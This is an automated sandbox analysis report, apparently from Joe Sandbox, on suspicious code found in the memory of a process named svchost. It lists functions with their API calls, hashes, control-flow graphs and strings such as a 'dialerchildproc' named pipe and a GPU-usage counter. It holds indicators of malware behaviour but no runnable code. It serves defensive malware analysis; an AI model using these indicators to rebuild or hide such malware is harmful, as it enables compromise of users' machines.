                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: d8a3677eb0ab1bfc5ac1c63b2b99d00723214a86536ce85ca85354c68c7dac87
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 6E81A121F106818BFA549B65E88D399329DAF8BF88F5C4125E94983796DF3DC9CD8303
                                                                  Function 000002A66130D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 162 2a66130d258-2a66130d27a GetLastError 163 2a66130d299-2a66130d2a4 FlsSetValue 162->163 164 2a66130d27c-2a66130d287 FlsGetValue 162->164 167 2a66130d2a6-2a66130d2a9 163->167 168 2a66130d2ab-2a66130d2b0 163->168 165 2a66130d289-2a66130d291 164->165 166 2a66130d293 164->166 169 2a66130d305-2a66130d310 SetLastError 165->169 166->163 167->169 170 2a66130d2b5 call 2a66130dafc 168->170 171 2a66130d312-2a66130d324 169->171 172 2a66130d325-2a66130d33b call 2a66130cb78 169->172 173 2a66130d2ba-2a66130d2c6 170->173 185 2a66130d358-2a66130d363 FlsSetValue 172->185 186 2a66130d33d-2a66130d348 FlsGetValue 172->186 175 2a66130d2d8-2a66130d2e2 FlsSetValue 173->175 176 2a66130d2c8-2a66130d2cf FlsSetValue 173->176 179 2a66130d2f6-2a66130d300 call 2a66130cfc4 call 2a66130db74 175->179 180 2a66130d2e4-2a66130d2f4 FlsSetValue 175->180 178 2a66130d2d1-2a66130d2d6 call 2a66130db74 176->178 178->167 179->169 180->178 191 2a66130d3c8-2a66130d3cf call 2a66130cb78 185->191 192 2a66130d365-2a66130d36a 185->192 189 2a66130d34a-2a66130d34e 186->189 190 2a66130d352 186->190 189->191 194 2a66130d350 189->194 190->185 195 2a66130d36f call 2a66130dafc 192->195 197 2a66130d3bf-2a66130d3c7 194->197 198 2a66130d374-2a66130d380 195->198 199 2a66130d392-2a66130d39c FlsSetValue 198->199 200 2a66130d382-2a66130d389 FlsSetValue 198->200 202 2a66130d39e-2a66130d3ae FlsSetValue 199->202 203 2a66130d3b0-2a66130d3b8 call 2a66130cfc4 199->203 201 2a66130d38b-2a66130d390 call 2a66130db74 200->201 201->191 202->201 203->197 208 2a66130d3ba call 2a66130db74 203->208 208->197
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002A66130F0FC,?,?,?,?,000002A66130C3CF,?,?,?,?,?,000002A661307EE0), ref: 000002A66130D35C
                                                                    • Part of subcall function 000002A66130DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002A66130D432,?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D384
                                                                    • Part of subcall function 000002A66130DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002A66130643A), ref: 000002A66130DB8A
                                                                    • Part of subcall function 000002A66130DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002A66130643A), ref: 000002A66130DB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 8265c23a4ccf136d65ec441aeaaa312edad24db801d5ca1131a419eed8c37940
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 3A418A20F0168443FA58A335555D36E22DE5B4BFB2F1C4728AD372B7D6DF2C844A8687
                                                                  Function 000002A661302FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 5c55e335d4956d0e116a84cf8c0a623a6748ba139191798feb857f98657cbe97
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: AC318072F00A808BF720DF62A80C759B3A4F78AF96F4845259E4B63A65DF7CC45D8781
                                                                  Function 000002A6612D9D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: fa2c83ff83d554cdffb8e1bf8d61ac0f573b740e624b4cb83b305fbf64bdb7eb
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 82E16932F04B808BEB209B65D44C79D37ACFB46B98F184515EE8957B99CF38C598C702
                                                                  Function 000002A66130F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 446 2a66130f7c4-2a66130f816 447 2a66130f907 446->447 448 2a66130f81c-2a66130f81f 446->448 451 2a66130f909-2a66130f925 447->451 449 2a66130f829-2a66130f82c 448->449 450 2a66130f821-2a66130f824 448->450 452 2a66130f8ec-2a66130f8ff 449->452 453 2a66130f832-2a66130f841 449->453 450->451 452->447 454 2a66130f851-2a66130f870 LoadLibraryExW 453->454 455 2a66130f843-2a66130f846 453->455 456 2a66130f926-2a66130f93b 454->456 457 2a66130f876-2a66130f87f GetLastError 454->457 458 2a66130f946-2a66130f955 GetProcAddress 455->458 459 2a66130f84c 455->459 456->458 464 2a66130f93d-2a66130f940 FreeLibrary 456->464 460 2a66130f8c6-2a66130f8d0 457->460 461 2a66130f881-2a66130f898 call 2a66130cd58 457->461 462 2a66130f957-2a66130f97e 458->462 463 2a66130f8e5 458->463 465 2a66130f8d8-2a66130f8df 459->465 460->465 461->460 468 2a66130f89a-2a66130f8ae call 2a66130cd58 461->468 462->451 463->452 464->458 465->453 465->463 468->460 471 2a66130f8b0-2a66130f8c4 LoadLibraryExW 468->471 471->456 471->460
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: fb6a9c524fc5d3484979de7ddd0c04845f897be2528b6da75aca7f880f4762e4
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 3D41FF22B11A1093EA56DB26A80C79523DDBB47FE1F0C41299D0FA7784EF3CC54D8386
                                                                  Function 000002A661302334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: 38e7ba86b214d779e40598ff6136bc5f85aa100ce0c60efaae3f90949e3f069e
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 0C113A76A18B8083E710CB61F50D35A7775F38AFA5F584315EA9A13AA8CFBCC148CB41
                                                                  Function 000002A66130A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A279
                                                                  • GetLastError.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 21f7652a1c3b2d3b08e2bd85ed527b7237bdaf8575ce5e9d5578602fc49127b5
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 9031AD21B12A50A3EE129B46A80C75533ECB74AFA1F5D06349D1B6B3A1EF7DC1488382
                                                                  Function 000002A661303BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 8a448f16fba570ede5e25b879f06153b1a11ef346cff490b08676d39210bb097
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: 18117936B04B8087EF649B66E40C66972B9F78AF95F090428DE8E53794EF3DC648C705
                                                                  Function 000002A661305F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 3b88e18f3e288b5316be95c728ea3f6a2be064616dc03a0298ce9d4779e724bd
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: F6D1AA76608B8882EA70DB06E49835A77F4F389F85F140116EACE57B69CF3DC585CB81
                                                                  Function 000002A66130D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D464
                                                                  • SetLastError.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: becaec30be5092c1e4cac6dff0987991ecdd20111dfc16942f9dfa5579a7e985
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: BF11AF20F0568043FA54A331A64D36922DE6B4AFF2F0D4328AC37377DADF2C94498687
                                                                  Function 000002A661303B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: db93e4b3c4a6dc20d81bcde0db7a7504087a0a358164d2d7daf917041e098eb2
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 4F016974B15B8487EB209B62E80D71933B8BB4AF46F080528C94E27365EF3DC14CC702
                                                                  Function 000002A6612D8835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 2bb15305fd1648b5f4597f4a9c6c99a4857e4ed9157c84268d7e5898f9ababa5
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: 3451BD32F126408BEB15CB25E44CB98379DFB46F98F199120DA8643788DF38D9C9E706
                                                                  Function 000002A6612D8818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 46947ff9c8787e56f9549501a482bedb074f50c7edd2e0661ed9604ccbab6123
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 0B317832B1168097E7149F21E84CB5937ACFB42F98F199014EE8647789CF3CC989D706
                                                                  Function 000002A66130330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: da98ef6b121364779e5a87a907428e844d129fab95bcf11ad97ec07c455dc5e3
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 8BF08CA0B04BC083EA108B53B94D11AB769BB8AFC0F0C8430EE5B27B28CF6CC449C701
                                                                  Function 000002A661305B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: 27f13dda94eecf94b99b9bf4721527bf61351b2ee317b72a15c5a9166f734d31
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: D661FA32A19B4487EB60DB15E44C31A77E4F389B85F140216EA8E57BA8CF7CC448CF81
                                                                  Function 000002A6612E3934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
